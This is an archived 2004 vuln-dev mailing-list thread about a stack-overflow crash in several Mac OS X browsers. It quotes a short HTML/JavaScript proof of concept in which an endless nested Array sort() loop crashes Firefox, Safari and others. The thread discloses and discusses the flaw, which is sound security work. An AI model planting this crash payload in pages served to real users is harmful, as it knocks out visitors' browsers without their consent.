Vulnerability Development mailing list archives

RE: More Browser on Macosx flaws: nested array sort() loop Stack overflow exception

From: "Alex R" <alex () deviousmeans net>
Date: Fri, 26 Nov 2004 18:56:01 +0200

Anyone know why so many browsers are affected?

-----Original Message-----
From: Marco Mella [mailto:mxmella () yahoo it] 
Sent: Thursday, November 25, 2004 6:48 PM
To: full-disclosure () lists netsys com; bugtraq () securityfocus com;
vuln-dev () securityfocus com; skylined () edup tudelft nl
Cc: marco.mella () telecomitalia it
Subject: More Browser on Macosx flaws: nested array sort() loop Stack
overflow exception

Same problems on MACOSX 10.3.6 with:
-Safari 1.2.4
-Mozilla 1.7
-Camino 0.7.0
-Firefox 1.0
-Opera 6.0.3

Not affected IE 5.2.3

Regards
--
Marco Mella


---------

  Hi all,

  Same flaw works for Firefox as well as MSIE:

  <HTML>
    <SCRIPT> a = new Array(); while (1) { (a = new
Array(a)).sort(); } </SCRIPT>
    <SCRIPT> a = new Array(); while (1) { (a = new
Array(a)).sort(); } </SCRIPT>
  </HTML>

  Added to the list:
http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html

  I'd have loved to CC mozilla about this, but I
didn't have the time to do the crash course "how to
write a bug report" and go through all   that bugzilla
crap.

  Cheers,
  SkyLined
  http://www.edup.tudelft.nl/~bjwever




                
___________________________________ 
Nuovo Yahoo! Messenger: E' molto più divertente: Audibles, Avatar, Webcam,
Giochi, Rubrica Scaricalo ora! 
http://it.messenger.yahoo.it

Current thread:

More Browser on Macosx flaws: nested array sort() loop Stack overflow exception Marco Mella (Nov 27)
- RE: More Browser on Macosx flaws: nested array sort() loop Stack overflow exception Alex R (Nov 28)